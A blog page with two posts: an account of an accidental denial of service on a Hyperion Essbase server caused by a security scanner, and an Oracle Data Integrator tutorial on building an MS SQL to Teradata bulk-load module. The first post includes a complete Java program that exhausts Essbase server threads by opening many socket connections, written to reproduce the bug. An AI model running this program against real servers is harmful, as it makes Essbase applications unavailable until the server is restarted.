Monday, May 9, 2016

Accedantal DoS attack to Hyperion Essbase Server


 Introduction

One morning hyperion developers started complain on Essbase, hyperion services were not able connect to Essbase (including EAS console). Every try hanged client, and we had to kill process thought task. We stopped Essbase service and started it again, then everythings works fine. But what did happen with Essbase???


Accedantal DoS attack

(Bug applied to Hyperion Essbase 11.1.2.3.500+ and 11.1.2.4.0+) 
     In my opinion developers of Hyperion EPM products don't seriously worried about external security, because it mostly uses in private corporate networks, therefore they let use old versions of JDK, application servers and other services, because nobody need to hack Hyperion EPM in private corporate network. 
     But... return to our Essbase incident. At first I checked Essbase logs and noticed something interesting:






I saw multiple non secure connection directly to Essbase Application process (ESSSVR). I was sure, multiple connections hangs Essbase server. The number of connection equals to SERVERTHREADS parameter from ESSBASE.cfg. This DoS attack was made by security scanner, which our security service uses for scanning internal network.

How reproduce this issue?


Lets look at  essbase application, it has 3 open ports



Every port can get only SERVERSTHREADS connection.

I need to reproduce this issue, therefore I made simple java program for it.

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.Socket;
public class EssbaseDoSConnector{
 public static void main(String[] args){
  if(args.length!=4){
   System.out.println("USAGE: HOST BEGIN_PORT END_PORT NUMBER_OF_SESSIONS");
   return;
  }
  String hostName = args[0];
  int sessionNumber = Integer.parseInt(args[3]); // number of sessions
  int startPort=Integer.parseInt(args[1]),endPort=Integer.parseInt(args[2]);
  int cnt=0;
  for(int port=startPort;port<=endPort;port++){
   for(int j=0;j<sessionNumber;j++){
    try{
     System.out.println("connecting to port "+port);
     Socket socket = new Socket(hostName, port);
     cnt++;
     PrintWriter out = 
      new PrintWriter(socket.getOutputStream(),true);
     out.write("TEST MESSAGE\n"); 
     out.write("TEST MESSAGE\n"); 
     out.write("TEST MESSAGE\n"); 
     out.write("TEST MESSAGE\n"); 
    }catch(Exception e){
     System.out.println("Error connecting port "+port+" port is busy");
    }
    
   }
  }
  System.out.println("FINISH - number of successful connections:"+cnt);
   
 }
}

Compilation is very simple:


 It has 4 parameters:
HOST - essbase server name
BEGIN_PORT - begin port of essbase application (in our example 32786 )
END_PORT - end port of essbase application (in our example 32788 )
NUMBER_OF_SESSION is   number of server threads in essbase.cfg

Lets try:







At first sight, nothing critical happens... Threads limit was achieved, and than essbase closed sessions.

Try again:




The same result, but Essbase  application can't accept new incoming connections,  during some time all applications become inaccessible....



We need to restart Essbase server for repairing Essbase....

P.S.

Nobody wanted to attack Essbase server) it was standard security check which hangs all essbase servers.
Be careful with security scanners. Metalink contains several documents about similar issues, but it didn't helped, therefore  administrators have to worried about this issue, because it could be critical for Essbase Server and data.

Good luck )

Monday, May 2, 2016

Oracle Data Integrator: Creating custom LKM for different DB (MS SQL to TERADATA)


   Three months passed from the last post. I have many ideas but there is no time, because of my job where I developing interesting project (as java developer) and parallel studied machine learning course on coursera.org (I learned many useful things and increase my python skills).

 

 Introduction


    Now I going to talk about Oracle Data Integrator, specifically about customizing LKM.  Data flows between different RDBMS is one of the main tasks  for data integrator. ODI has many knowledge modules "from the box", but it could not cover all needs. For example, I had one task six month ago. I had to load data from MS SQL to TERADATA, If tables are small, you can use standard LKM SQL to SQL, but if table contains millions rows it is a problem, because this LKM works very slow.  You can see this notification in description of module
Restrictions:
- This Knowledge Module is NOT RECOMMENDED when using LARGE VOLUMES. Other specific modules using Bulk utilities (SQL)
   Obviously, we have to use modules which uses  bulk utilities. 

 

Background

 

Goal


So, we need knowledge module which uses bulk utils in both sides (on source and target). In our case, it  is BCP and  TBUILD for Teradata. The first utility export data, and second one load data into target system.

 

Implementation


We could take two knowledge modules and merge it in one. For example lets take
LKM MSSQL to MSSQL (BCP) - it will be a base module for src procedure
LKM SQL to TERADATA (TTU) - for target 


The first module uses standard BCP utility for bulk export, there for we take only part for exporting data in file.
From the second LKM  we get many commands, lets see the result  (is a merge module)

LEGEND
YELLOW -  command from LKM MSSQL to MSSQL (BCP)
RED  commands  from LKM SQL to TERADATA (TTU)
GREEN  custom commands....

And we have to merge options too


But its not the end. LKM needs more deep customization.

1. Task export data from SQL in file
Export from BCP must be in the format suitable for import utility teradata TTU. This prevents unnecessary file transformation.  
Original task BCP out data to temporary bcp file looks like:

1
2
3
4
5
6
<%=snpRef.getUserExit("CMD_SHELL")%> "<%=snpRef.getUserExit("BCP_DIRECTORY")%>/bcp" <%=snpRef.getInfo("SRC_WORK_CATALOG")%>.<%=snpRef.getInfo("SRC_WORK_SCHEMA")%>.<%=snpRef.getInfo("COLL_NAME")%>_V out <%=snpRef.getUserExit("DEFAULT_DIRECTORY")%>/X<%=snpRef.getSession("SESS_NO")%>.bcp <%  
if (odiRef.getUserExit("UNICODE_SUPPORT").equals("1")) 
  out.print(" -w ");
else
  out.print(" -c ");
%> -S<%=snpRef.getInfo("SRC_DSERV_NAME")%> -U<%=snpRef.getInfo("SRC_USER_NAME")%> -P<%=odiRef.getInfo("SRC_PASS")%> > <%=snpRef.getUserExit("DEFAULT_DIRECTORY")%>/X<%=snpRef.getSession("SESS_NO")%><%=odiRef.getStep( "NNO" )%>.out.log 
And it exports whole table, but I had some limitations by access (I didn't have access on creating view or table on src server), I was going to export only several filtered columns...

Therefore I had to modified code for using query instead of table name. Notice that BCP is command line utility so, we had to remove all newline symbols.replaceAll("\n"," "). New step looks like:


OdiOSCommand -ERR_FILE=<?=getLKMOptions.getTempDir(\u0022<%=odiRef.getUserExit("DEFAULT_DIRECTORY")%>\u0022)?>X<%=snpRef.getSession("SESS_NO")%><%=odiRef.getStep( "NNO" )%>.out.err  -OUT_FILE=<?=getLKMOptions.getTempDir(\u0022<%=odiRef.getUserExit("DEFAULT_DIRECTORY")%>\u0022)?>X<%=snpRef.getSession("SESS_NO")%><%=odiRef.getStep( "NNO" )%>.out.log 
<% path=odiRef.getOption("BCP_PATH");
if (path.length()>0) 
  out.print(path+"/bcp ");
else
  out.print("bcp ");
query=("select "+odiRef.getPop("DISTINCT_ROWS")+ odiRef.getColList("", "[EXPRESSION]\t[ALIAS_SEP] [CX_COL_NAME]", ",", "", "")+" from "+odiRef.getFrom()+" where (1=1) "+ odiRef.getFilter()+odiRef.getJrnFilter()+odiRef.getJoin()+odiRef.getGrpBy()+odiRef.getHaving()).replaceAll("\n"," ");



%>  "<% out.print(query); %>"  queryout <?=getLKMOptions.getTempDir(\u0022<%=odiRef.getUserExit("DEFAULT_DIRECTORY")%>\u0022)?>X<%=snpRef.getSession("SESS_NO")%><%=odiRef.getStep( "NNO" )%>.bcp  <%  
if (odiRef.getUserExit("UNICODE_SUPPORT").equals("1")) 
  out.print(" -w ");
else
  out.print(" -c ");
%> <%  
if (!odiRef.getUserExit("BCP_LOCAL_SERVER").equals("1")) 
  out.print(" -S"+odiRef.getInfo("SRC_DSERV_NAME"));
%> -U<%=odiRef.getInfo("SRC_USER_NAME")%> -P"<%=odiRef.getInfo("SRC_PASS")%>"  <%
terminator=odiRef.getOption("FIELD_SEPARATOR");
 if (terminator.length()>0) {
    if (terminator.equals("' '")) 
      out.print(" -t"+(char)34+" "+(char)34);
    else
      out.print(" -t"+terminator);
} 
%>  <% recordTerminator=odiRef.getUserExit("RECORD_SEPARATOR");
 if (recordTerminator.length() > 0) 
  out.print(" -r" +  recordTerminator);
%> -C1251


Note, that we use the same FIELD_SEPARATOR and ROW_SEPARATOR  in both utilities.
The result of this stage is *.bcp file with data, than we have to load it into TERADATA.


2. Loading data from file to Teradata using TBUILD
LKM File to Teradata (TTU) allows using of several utilits:

I used TPT-LOAD, because I didn't modified code for supporting all utilities.
At fist we have to generate script for TPT_LOAD utility. It is Generate ttu script stage.


OdiOutFile "-File=<?=getLKMOptions.getTempDir(\u0022<%=odiRef.getUserExit("DEFAULT_DIRECTORY")%>\u0022)?>X<%=snpRef.getSession("SESS_NO")%><%=odiRef.getStep( "NNO" )%>.script"
<% if (odiRef.getOption("TERADATA_UTILITY").startsWith("TPT")) { 
/********************************************************************************/ 
/* Parallel Transporter Script    */ 
/********************************************************************************/ %>
DEFINE JOB ODILoad<%=odiRef.getStep("SESS_NO")%>
DESCRIPTION 'ODI step name: <%=odiRef.getStep("STEP_NAME")%> ODI step #:<%=odiRef.getStep("NNO")%> from session #<%=odiRef.getStep("SESS_NO")%>'
(
DEFINE SCHEMA StagingTable
DESCRIPTION 'Staging table for <%=odiRef.getTable("L", "TARG_NAME", "D")%>'
(
<%=odiRef.getColList("", "\t[CX_COL_NAME]\t"+
 /* Is this a date? Then we need to translate into ANSIDATE type */
 "<? if (\u0022[DEST_DT]\u0022.equals(\u0022DATE\u0022)) { ?>"+
  "ANSIDATE"+
 /* otherwise use standard data type */
 "<? } else { ?>"+
  "[DEST_WRI_DT]"+
 "<?};?> "+ odiRef.getInfo("DEST_DDL_NULL"),  
 ",\n", "","")%>
);
DEFINE SCHEMA SourceFile
DESCRIPTION 'Staging table for <%=odiRef.getTable("L", "TARG_NAME", "D")%>'
(
<%=odiRef.getColList("", "\t[CX_COL_NAME]\t"+
 /* Is this a date or timestamp field? Then we set the buffer length independent of LONGC */
 "<? if (\u0022[DEST_DT]\u0022.equals(\u0022DATE\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP(0)\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP() WITH TIME ZONE\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP(0)\u0022))  {?>"+
  "VARCHAR(21)"+
 "<?} else ?>"+
 /* Is this a numeric field? Then we add +2 to the length to include potential sign and decimal separator. */
 "<? if (\u0022[DEST_DT]\u0022.equals(\u0022BIGINT\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022BYTE\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022BYTEINT\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022DECIMAL\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022DOUBLE PRECISION\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022FLOAT\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022INTEGER\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022NUMERIC\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022REAL\u0022) ||"+
 "         \u0022[DEST_DT]\u0022.equals(\u0022SMALLINT\u0022))  {?>"+
  "VARCHAR(<?=(new Integer([LONGC]+2)).toString()?>)"+
 "<? } else {      ?>"+
  "VARCHAR([LONGC])"+
 "<?};?>"+
 "", ",\n", "","")%>
);

DEFINE OPERATOR FileReader
DESCRIPTION 'Read File Using DataConnector'
TYPE DATACONNECTOR PRODUCER
SCHEMA SourceFile
ATTRIBUTES
(
 VARCHAR PrivateLogName,
 VARCHAR FileName = '<% out.print( odiRef.getOption("DEFAULT_DIRECTORY")+"\/X");%><%=snpRef.getSession("SESS_NO")%><%=odiRef.getStep( "NNO" )%>.bcp', /*Name of the file read from or written to*/
 VARCHAR OpenMode = 'Read', /*How to open the file: read, write, or writeappend*/
 VARCHAR Format = 'delimited', 
 VARCHAR TextDelimiter = '<%=odiRef.getOption("FIELD_SEPARATOR")%>',
 VARCHAR IndicatorMode = 'N', /*Whether indicator bytes are used in the operation*/
 INTEGER RowsPerInstance,
 INTEGER VigilWaitTime,
 VARCHAR VigilStartTime,
 VARCHAR VigilStopTime,
 VARCHAR VigilNoticeFileName,
 VARCHAR TraceLevel = 'none'
);

<% if (odiRef.getOption("TERADATA_UTILITY").equals("TPT-LOAD")) { %>
DEFINE OPERATOR LoadStagingTable
TYPE LOAD
SCHEMA *
ATTRIBUTES
(
 INTEGER MaxSessions = <%=odiRef.getOption("SESSIONS")%>,
 <% if ((new java.lang.Integer(odiRef.getOption("MAX_ALLOWED_ERRORS"))).longValue()>0) {%>INTEGER ErrorLimit = <%=odiRef.getOption("MAX_ALLOWED_ERRORS")%>,<%}; %>
 VARCHAR UserName = '<%=odiRef.getInfo("DEST_USER_NAME")%>',
 VARCHAR UserPassword = '<%=odiRef.getInfo("DEST_PASS")%>',
 VARCHAR LogTable = '<%=odiRef.getTable("L", "COLL_NAME", "W").replaceAll("<.=","<?s=").replaceAll("..>",".replaceAll((char)92+\\u0022.\\u0022,\\u0022.LOG_\\u0022); out.print(s.substring(0,s.indexOf(\\u0022.\\u0022)+1+java.lang.Math.min(s.length()-s.indexOf(\\u0022.\\u0022)-1,"+ odiRef.getInfo("DEST_MAX_TAB_NAME_LEN") +")));?>")%>',
 VARCHAR TargetTable = '<%=odiRef.getTable("L", "COLL_NAME", "W")%>T',
 VARCHAR ErrorTable1 = '<%=odiRef.getTable("L", "COLL_NAME", "W").replaceAll("<.=","<?s=").replaceAll("..>",".replaceAll((char)92+\\u0022.\\u0022,\\u0022.ET_\\u0022); out.print(s.substring(0,s.indexOf(\\u0022.\\u0022)+1+java.lang.Math.min(s.length()-s.indexOf(\\u0022.\\u0022)-1,"+ odiRef.getInfo("DEST_MAX_TAB_NAME_LEN") +")));?>")%>',
 VARCHAR ErrorTable2 = '<%=odiRef.getTable("L", "COLL_NAME", "W").replaceAll("<.=","<?s=").replaceAll("..>",".replaceAll((char)92+\\u0022.\\u0022,\\u0022.UV_\\u0022); out.print(s.substring(0,s.indexOf(\\u0022.\\u0022)+1+java.lang.Math.min(s.length()-s.indexOf(\\u0022.\\u0022)-1,"+ odiRef.getInfo("DEST_MAX_TAB_NAME_LEN") +")));?>")%>',
 VARCHAR PauseAcq,
 VARCHAR PrivateLogName,
 VARCHAR TdpId ='<%=odiRef.getInfo("DEST_DSERV_NAME")%>'
);
<% }; if (odiRef.getOption("TERADATA_UTILITY").equals("TPT-SQL-INSERT")) { %>
DEFINE OPERATOR LoadStagingTable
TYPE INSERTER
SCHEMA *
ATTRIBUTES
(
 VARCHAR UserName = '<%=odiRef.getInfo("DEST_USER_NAME")%>',
 VARCHAR UserPassword ='<%=odiRef.getInfo("DEST_PASS")%>',
 VARCHAR PrivateLogName,
 VARCHAR TdpId ='<%=odiRef.getInfo("DEST_DSERV_NAME")%>'
);
<%}%>

APPLY
(
 'INSERT INTO <%=odiRef.getTable("L", "COLL_NAME", "W")%>T
 (
 <%=odiRef.getColList("", "\t[CX_COL_NAME]", ",\n\t", "","")%>
 )
 VALUES 
 (
  <%=odiRef.getColList("", ":[CX_COL_NAME]"+
  /* Is this a date or timestamp field? Then apply teradata cast. */
  "<? if (\u0022[DEST_DT]\u0022.equals(\u0022DATE\u0022) ||"+
  "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP\u0022) ||"+
  "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP(0)\u0022) ||"+
  "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP() WITH TIME ZONE\u0022) ||"+
  "         \u0022[DEST_DT]\u0022.equals(\u0022TIMESTAMP(0) WITH TIME ZONE\u0022))  {?>"+
  "\t(TIMESTAMP(3), FORMAT ''YYYYMMDDHHMISS.S(3)'')"+
  "<? };?>"
  , ",\n\t\t", "","")%>
 );'
)
TO OPERATOR 
(
 LoadStagingTable[1]
)
 SELECT 
 <%=odiRef.getColList("", "\t[CX_COL_NAME]", ",\n\t", "", "")%>
 FROM OPERATOR(FileReader[1]); 
);

<%}%>

This script reads export BCP file and loads it into work table on target system, I made minimal changes for Generate ttu script stage.

Next stage is Load to staging area. This part  is very important, because it runs tbuild utility with a script which we built on previous step.

from jarray  import array
from java.lang  import Thread
from java.io  import BufferedOutputStream
from java.io  import PrintStream
from java.lang import String
from java.lang  import Runtime
from java.lang  import System
from java.io   import StringWriter
from java.io   import InputStreamReader
from java.io   import OutputStreamWriter
from java.io   import BufferedReader
from java.io   import BufferedWriter
from java.io   import FileReader
from java.io   import FileWriter
from jarray   import array 
from jarray   import zeros
import com.sunopsis.dwg.tools.SqlUnload as JSnpsSqlUnload
import java.util.Vector as JVector
import threading
import time
import os
from datetime import datetime

#
# Source connection variables
#
srcdriver = "<%=odiRef.getInfo("SRC_JAVA_DRIVER")%>"
srcurl = "<%=odiRef.getInfo("SRC_JAVA_URL")%>"
srcuser = "<%=odiRef.getInfo("SRC_USER_NAME")%>"
srcpass = "<%=odiRef.getInfo("SRC_ENCODED_PASS")%>"
fetchsize = "<%=odiRef.getInfo("SRC_FETCH_ARRAY")%>"
LOG_FILE_NAME='<%=odiRef.getOption("LOG_FILE")%>' 
#
# Temporary Files variables
#
filename = r"<?=getLKMOptions.getTempDir(\u0022<%=odiRef.getUserExit("DEFAULT_DIRECTORY")%>\u0022)?>X<%=snpRef.getSession("SESS_NO")%><%=odiRef.getStep( "NNO" )%>.%s"                               
#"<%=odiRef.getOption("DEFAULT_DIRECTORY")%>/<%=odiRef.getTable("L", "TARG_NAME", "W")%>_<%=odiRef.getInfo("SRC_SET_NAME")%>.%s"
logname = filename % "log"
scriptname = filename % "script"
outname   = filename % "out"
dataname = r"<% 
  out.print( odiRef.getOption("DEFAULT_DIRECTORY")+"/"+odiRef.getTable("L", "TARG_NAME", "W")+"_"+odiRef.getInfo("SRC_SET_NAME")+".data" );
 %>" 

#
# Unload Options
#
fieldsep = "<%=odiRef.getOption("FIELD_SEPARATOR")%>"
datefmt = "yyyyMMddHHmmss.SSS"
# query has already been defined in previous step

#
# Load Options
#
loadcmd = r"""<% 
 if (odiRef.getOption( "TERADATA_UTILITY" ).equals( "FASTLOAD" )) { %>fastload < "%s" > "%s"<% } else
 if (odiRef.getOption( "TERADATA_UTILITY" ).equals( "MLOAD" ))  { %>mload < "%s" > "%s"<% } else
 if (odiRef.getOption( "TERADATA_UTILITY" ).equals( "TPUMP" ))   { %>tpump < "%s" > "%s"<% } else
       { %>tbuild -f "%s" tdjob<%};%> """
loadcmd = loadcmd % (scriptname)
utility = r"""<% 
 if (odiRef.getOption( "TERADATA_UTILITY" ).equals( "FASTLOAD" )) { %>fastload<% } else
 if (odiRef.getOption( "TERADATA_UTILITY" ).equals( "MLOAD" ))  { %>mload<% } else
 if (odiRef.getOption( "TERADATA_UTILITY" ).equals( "TPUMP" ))   { %>tpump<% } else
       { %>tbuild -f %s <%};%> """ <%
 if (odiRef.getOption( "TERADATA_UTILITY" ).startsWith( "TPT" ))  { %> % (scriptname)<%};%>

lf = None

class Gobbler(Thread):
 def __init__(self, stream, label):
  self.br = BufferedReader(InputStreamReader(stream))
  self.label = label
 def run(self):
  line=self.br.readLine()
  while (line != None):
   print >> lf, self.label + line
   line=self.br.readLine()
  #print >>lf, "ODI: End of polling of " + self.label


class Writer(Thread):
 def __init__(self, stream):
  self.ps = PrintStream(BufferedOutputStream(stream))
 def run(self):
  fsrc = open(r"<%=odiRef.getOption("DEFAULT_DIRECTORY")%>/<%=odiRef.getTable("L", "TARG_NAME", "W")%>_<%=odiRef.getInfo("SRC_SET_NAME")%>.script", 'r') 
  try:
   for lsrc in fsrc.readlines():
    self.ps.println(lsrc)
  finally:
   fsrc.close()
  self.ps.flush()
  self.ps.close()


#write log to file 
def write_log(strlog):
    logfile=open(LOG_FILE_NAME, "a")
    strtime=datetime.now().strftime('%Y-%m-%d %H:%M:%S')+':'+strlog
    strtime=strtime+'\n'
    logfile.write(strtime)
    logfile.close()
    print strtime
#===========================
# load()
# executes the file based loadd
#===========================
def load():
    write_log('Run export from teradata '+loadcmd)
    #ok status
    error_result=0
    try:
        out,err,status = run_process()
        write_log (' output='+out +'\n error='+err+'\n status='+str(status))
        if status!=0:
            write_log ('ERROR status='+str(status))
            error_result=1
        else:
            write_log ('Status OK')
        
    except Exception,ex:
        err=str(ex)
        write_log ('Error running command '+ loadcmd+'\n'+err)
        error_result=1
    #if error rise
    if(error_result==1):
        raise Exception(error_result,err)   
def run_process():     
    #run console process and  returns its output
    #Return (process output, error output, status code)
    import subprocess
    loadcmd = r"""tbuild -f %s tdJob"""%(scriptname)
    p = subprocess.Popen(loadcmd.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    #wait until process finished
    p.wait
    #read output
    out, err = p.communicate()
    #process return code
    status = p.returncode
    return out,err,status
 
#snpssqlunload()
load()

I rewrote load procedure and add run_process function. Standard load() procedure uses os.system function to run tbuild
But I used subprocess class to run utility, because it allowes to read output from console and I could write  output into the log file:
        out,err,status = run_process()
        write_log (' output='+out +'\n error='+err+'\n status='+str(status))
        if status!=0:
            write_log ('ERROR status='+str(status))
            error_result=1
        else:
            write_log ('Status OK')

Output in the log files helps to debug errors which occures on the load stage.

Verification
Some words about custom stages Calculate number of exported rows and Verify results
These stages are uses for verification number of exported/imported rows, it must be equal. You could made these steps optional (but I worried about data losing therefore always use it).
Calculate number of exported rows (pre-integration step)
It calculates the number of rows in export file
Verify results (post-integration step) - it count rows in target

 

Results


Lets try new LKM MS SQL to TERADATA knowledge module,
Test data:
Sources Microsoft SQL table size:  approximately 70 000 000 rows
BCP file size: approximately 7 GB
Time execution: 4001 seconds
Our new module loads 70 000 000 rows to target Teradata table for 4001 - it is not bad result!
I compared it with standard LKM SQL to SQL with same source table
Sources Microsoft SQL table size:  approximately 70 000 000 rows....
I have waited for 10 000 seconds.... And aborted session, because  it loads only 146000 rows in work table for this time.... Simple calculation, we need 479 000 seconds to load 70 millions rows.... Not fast, is not it?

Counclusion

   ODI gives us powerful tools for Integration, many modules,  but it are only peaces of the puzzle, where picture is our Integration Solution. As you can see, it is not a hard task to create custom knowledge modules for flows between databases, which not implemented in standard LKM modules, we could merge existing modules and use it. The result saves our time and increase performance of integration solution.